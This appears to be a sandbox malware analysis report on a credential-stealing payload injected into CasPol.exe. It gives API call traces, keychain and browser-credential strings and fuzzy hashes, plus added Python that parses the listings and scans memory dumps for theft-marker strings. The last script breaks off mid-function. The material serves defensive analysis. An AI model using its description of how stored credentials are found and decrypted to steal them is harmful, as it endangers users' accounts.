  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 4101496090-3798722523
• Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
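The "APIs" bullets above follow a fixed shape (an optional "Part of subcall function ADDR:" prefix, then API.MODULE, optional arguments, and a ref address), and the "API ID" line under Similarity is a word-frequency digest of those API names: each CamelCase name is split into words, words are grouped by how often they occur, the groups are joined most-frequent first with "$" between them, and each group is sorted in ASCII order (uppercase before lowercase). The following Python is an added example for this report, not Joe Sandbox code. Its parser handles the three bullet forms on this page; the digest's stop-words (Get, Set, SH, Ex, W, A, and Box, which the page's summary for MessageBoxW omits) and its truncation of MSVC-mangled names at the first "@" are assumptions inferred from the API IDs shown here. The sample listings embedded in the block are copied from the report.

```python
"""Parse a Joe Sandbox "APIs" listing and rebuild its "API ID" digest.

Added example for this report, not Joe Sandbox code.  STOP and the handling of
mangled C++ names are assumptions inferred from the API IDs on this page.
"""
import re
from collections import Counter

# One bullet, e.g.
#   • FindFirstFileW.KERNELBASE(?,?,*.*), ref: 0040AE67
#   • memset.MSVCRT ref: 0041898C
#   • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

def parse_apis(text):
    """Return one record per API bullet; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref").upper(),
            "subcall": (m.group("sub") or "").upper() or None,
        })
    return records

def function_summary(records):
    """Separate the function's own calls from those attributed to its callees."""
    direct = [r["api"] for r in records if r["subcall"] is None]
    callees = {}
    for r in records:
        if r["subcall"]:
            callees.setdefault(r["subcall"], []).append(r["api"])
    return {"direct": direct, "callees": callees}

# Assumed stop-words: the page's digests drop these (e.g. GetProcAddress -> Proc, Address).
STOP = {"Get", "Set", "SH", "Ex", "W", "A", "Box"}

def tokens(api):
    """Split one API name into digest words."""
    if api.startswith("?"):                       # ??2@YAPAXI@Z -> ??2@ (assumed rule)
        return [api[: api.index("@") + 1]]
    if api[0].islower() or api[0] == "_":          # CRT names stay whole
        return [api]
    words = re.findall(r"[A-Z]+(?![a-z])|[A-Z][a-z]*", api)
    return [w for w in words if w not in STOP]

def api_id(records):
    """Group words by frequency, most frequent group first, ASCII order inside a group."""
    counts = Counter(t for r in records for t in tokens(r["api"]))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))

# Listings copied from this report.
SAMPLE_FIND = """\
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
"""
SAMPLE_SYSINFO = """\
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
"""
SAMPLE_MAIN = """\
• Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
• Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FIND, SAMPLE_SYSINFO, SAMPLE_MAIN):
        recs = parse_apis(sample)
        print(api_id(recs), function_summary(recs)["direct"])
```

Reproducing the digest is what makes it usable for hunting: the same function compiled into another sample yields the same API ID even when its address and instruction bytes differ, so the digest can be pivoted on across reports where the Opcode and Instruction IDs cannot.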

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
• Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
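Taken together, the strings in these two entries identify what the PE mapped at 0x400000 inside CasPol.exe (process 29, matching the 0000001D prefix of the dump name) is doing: the function above resolves CSIDL 0x1A (CSIDL_APPDATA) with SHGetSpecialFolderPathW, joins it with "Apple Computer\Preferences\keychain.plist" through the wcscpy/wcscat helper at 00409D1F, and probes the result with GetFileAttributesW; the entry here carries the command-line switches "/deleteregkey" and "/savelangfile" and the message "Error: Cannot load the common control classes.", which are characteristic of the NirSoft password-recovery utilities that Remcos drops to implement the browser-credential theft flagged in the detection summary. Because every string-handling call in the listing is a wide-character CRT function, these markers are stored as UTF-16LE in the binary and a plain ASCII grep over the dump misses them. The following Python is an added example for this report, not Joe Sandbox or Remcos code: it scans a dump for the page's markers in both encodings, resolves the CSIDL-relative path to the file the code looks for, and returns a verdict. The dump bytes are constructed inline, and the marker list, the CSIDL table and the three-marker threshold are the author's choices.

```python
"""Triage a memory dump for the credential-theft markers seen in this report.

Added example, not Joe Sandbox or Remcos code.  The dump is constructed below;
MARKERS, CSIDL and the verdict threshold are this example's own assumptions.
"""

# (label, string) pairs taken from the Strings / String ID / arguments on this page.
MARKERS = [
    ("keychain path",   r"Apple Computer\Preferences\keychain.plist"),
    ("cmdline switch",  "/deleteregkey"),
    ("cmdline switch",  "/savelangfile"),
    ("error string",    "Error: Cannot load the common control classes."),
    ("dir wildcard",    "*.*"),
]

# Subset of the Windows CSIDL table; 0x1A is the value passed to SHGetSpecialFolderPathW above.
CSIDL = {0x1A: "%APPDATA%", 0x1C: "%LOCALAPPDATA%", 0x26: "%ProgramFiles%"}

def resolve_target(csidl, relpath):
    """Path built by SHGetSpecialFolderPathW(csidl) + wcscat(relpath)."""
    return CSIDL[csidl] + "\\" + relpath

def find_strings(dump, markers=MARKERS):
    """Every occurrence of each marker, wide (UTF-16LE) or ASCII, sorted by offset."""
    hits = []
    for label, s in markers:
        for needle, enc in ((s.encode("utf-16-le"), "wide"), (s.encode("ascii"), "ascii")):
            off = dump.find(needle)
            while off != -1:
                hits.append((off, enc, label, s))
                off = dump.find(needle, off + 1)
    return sorted(hits)

def verdict(hits, threshold=3):
    """True when at least `threshold` distinct markers are present (assumed cut-off)."""
    return len({h[3] for h in hits}) >= threshold

def build_sample_dump():
    """Constructed stand-in for the 0x400000 region: a PE-like stub, then the
    page's strings stored the way the wide CRT calls expect them."""
    blob = bytearray(b"MZ" + b"\x00" * 62)
    for _, s in MARKERS:
        blob += s.encode("utf-16-le") + b"\x00\x00"
    return bytes(blob)

if __name__ == "__main__":
    dump = build_sample_dump()
    for off, enc, label, s in find_strings(dump):
        print(f"{off:#08x} {enc:5} {label:15} {s}")
    print("target:", resolve_target(0x1A, MARKERS[0][1]))
    print("credential-theft markers present:", verdict(find_strings(dump)))
```

Run against a real dump, the same scan is a cheap first pass before disassembly: a hit on the keychain path plus either command-line switch in an RWX region of a process such as CasPol.exe that has no business handling browser credentials is enough to prioritise that region for extraction.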

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                    • API String ID: 1297422669-2783969131

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898

Control-flow Graph

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID:
• API String ID: 2791496988-0

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658
                                                                                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (rendered graph not captured; node list recovered from the graph data as node: address range, calls/APIs -> successor nodes)
631: 40e175-40e1a1 call 40695d, call 406b90 -> 636, 637
636: 40e1a7-40e1e5 memset -> 638
637: 40e299-40e2a8 call 4069a3
638: 40e1e8-40e1fa call 406e8f -> 643, 644
643: 40e270-40e27d call 406b53 -> 638, 649
644: 40e1fc-40e219 call 40dd50 * 2 -> 643, 655
649: 40e283-40e286 -> 651, 652
651: 40e291-40e294 call 40aa04 -> 637
652: 40e288-40e290 free -> 651
655: 40e21b-40e21d -> 643, 656
656: 40e21f-40e235 call 40742e -> 643, 659
659: 40e237-40e242 call 40aae3 -> 643, 662
662: 40e244-40e26b _snwprintf, call 40a8d0 -> 643
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (rendered graph not captured; node list recovered from the graph data as node: address range, calls/APIs -> successor nodes)
716: 41837f-4183bf -> 717, 718
717: 4183c1-4183cc call 418197 -> 723, 724
718: 4183dc-4183ec call 418160 -> 725, 726
723: 4183d2-4183d8 -> 718
724: 418517-41851d (no successors, function exit)
725: 4183f6-41840b -> 727, 728
726: 4183ee-4183f1 -> 724
727: 418417-418423 -> 729
728: 41840d-418415 -> 729
729: 418427-418442 call 41739b -> 732, 733
732: 418444-41845d CreateFileW -> 734
733: 41845f-418475 CreateFileA -> 734
734: 418477-41847c -> 735, 736
735: 4184c2-4184c7 -> 739, 740
736: 41847e-418495 GetLastError, free -> 737, 738
737: 4184b5-4184c0 call 444706 -> 724
738: 418497-4184b3 call 41837f (the function's own entry) -> 724
739: 4184d5-418501 memset, call 418758 -> 746
740: 4184c9-4184d3 -> 739
746: 418506-418515 free -> 724
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
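The function summaries on this page (the WinINet URL-cache walker around 0040C274 that searches with the `visited:` pattern, the routine at 0040E175 carrying the `ContainerId`, `Container_%I64d` and `Containers` strings, and the CreateFileW/CreateFileA opener at 0041837F) are easier to pivot on once they are pulled out of the report text into records: the direct and subcall API names, the `String ID` list split on `$`, and the `Instruction Fuzzy Hash` that lets the same routine be matched against other memory-dump sections of the report. The parser below is an added example written for this page, not Joe Sandbox code. Its input is a constructed excerpt assembled from lines shown on this page (leading whitespace dropped), and the capability tags it assigns (`browser-history`, `mail-accounts`, `file-open-fallback`) are labels chosen here from the API and string evidence, not fields of the report.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: lines assembled from three function summaries on this
# page (leading whitespace dropped). Only the "• key: value" layout matters.
REPORT = """\
APIs
• memset.MSVCRT ref: 0040C298
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
• free.MSVCRT ref: 0040E28B
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
"""

# "<api>.<MODULE>(<args>), ref: <addr>" or "<api>.<MODULE> ref: <addr>"
API_RE = re.compile(
    r"^(?P<api>\S+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$"
)
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]{8}):\s+(?P<rest>.*)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)          # (api, module, ref) called directly
    subcall_apis: list = field(default_factory=list)  # (callee, api, module, ref) via sub-functions
    strings: list = field(default_factory=list)       # "String ID" split on "$"
    meta: dict = field(default_factory=dict)          # every other "key: value" field
    tags: list = field(default_factory=list)

    @property
    def fuzzy_hash(self) -> str:
        return self.meta.get("Instruction Fuzzy Hash", "")

    def api_names(self, include_subcalls: bool = True) -> set:
        names = {api for api, _, _ in self.apis}
        if include_subcalls:
            names |= {api for _, api, _, _ in self.subcall_apis}
        return names


def tag_function(rec: FunctionRecord) -> list:
    """Assumed mapping from API/string evidence to capability labels (labels chosen here)."""
    names = rec.api_names()
    tags = []
    if {"FindFirstUrlCacheEntryW", "FindNextUrlCacheEntryW"} & names or "visited:" in rec.strings:
        tags.append("browser-history")      # WinINet URL-cache walk filtered on "visited:" entries
    if {"ContainerId", "Containers"} & set(rec.strings):
        tags.append("mail-accounts")        # Windows Mail container naming seen in the strings
    if {"CreateFileW", "CreateFileA"} <= {api for api, _, _ in rec.apis}:
        tags.append("file-open-fallback")   # wide open with an ANSI retry path in the same function
    return tags


def parse_report(text: str) -> list:
    """Split the report text into one FunctionRecord per summary block."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue                       # section headers such as "APIs"/"Strings" carry no data
        line = line[1:].strip()
        sub = SUBCALL_RE.match(line)
        if sub:
            hit = API_RE.match(sub["rest"])
            if hit:
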